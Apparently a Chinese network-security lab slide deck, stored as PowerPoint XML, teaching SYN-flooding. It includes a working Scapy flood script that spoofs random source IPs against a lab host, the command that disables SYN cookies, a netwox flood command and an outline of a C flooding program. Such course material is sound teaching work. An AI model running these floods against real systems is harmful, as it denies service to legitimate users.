            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="471170" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342965701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16745-414E-4A48-9C63-21ABD8FD5A1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN-Flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7983371-85CA-4DFB-9BB6-1DE88B5A4231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#!/usr/bin/python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>scapy.all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> import IP, TCP, send</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ipaddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> import IPv4Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>from random import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>getrandbits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>a = IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>="172.17.0.3")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>b = TCP(sport=1551, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=23, seq=1551, flags='S’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>pkt = a/b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>while True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    pkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>[IP].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = str(IPv4Address(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>getrandbits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(32)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    send(pkt, verbose = 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{793C41F5-EC03-496A-90B2-C93495CA77CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="3140968"/>
            <a:ext cx="3168352" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何变成随机端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接箭头连接符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96017B0A-7E45-4CC6-B079-3608D0444C92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3419872" y="3371801"/>
            <a:ext cx="1080120" cy="462607"/>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11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F5346C-4280-481D-A1BC-9E69A08FBF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860032" y="5328300"/>
            <a:ext cx="3168352" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>合法用户还能访问，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未成功，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>why?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21884494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8B69B6-A578-4B7F-AF7C-022B4596C645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言编写程序进行攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABFBCC4-CAF2-4B92-AFE5-216375EE505A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp_flooding.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>myheader.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首部</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首部</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>校验和</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过原始套接字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425659276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C7EFA4-3223-45E1-B820-82B049946715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN-Flooding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击实施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7650AA8-2AF3-40DB-9D84-114E0C25DD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>关掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SYNCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -w net.ipv4.tcp_syncookies=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>查看服务器的连接状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>实施攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>netwox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> 76 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> 172.17.0.3 -p 23 –s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>raw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>再次查看服务器的连接状态，比较跟上次的不同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>从用户机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器，观察</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>停止攻击，再次观察</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265152252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CA52C-9616-4895-A0FA-0BD089E70087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>观察些什么呢？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F11CBE2D-EC7D-4523-9735-0938F4F99884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
